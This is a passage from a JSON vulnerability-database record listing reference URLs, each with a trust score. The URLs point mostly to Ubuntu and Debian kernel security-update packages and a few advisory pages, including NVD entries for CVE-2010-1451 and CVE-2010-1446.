        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic-pae_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/bugs/589163"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc-smp_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-preempt_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-common_2.6.32-22.36_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-preempt_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-22lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1451"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-22lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-22lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-22lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1446"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.1,
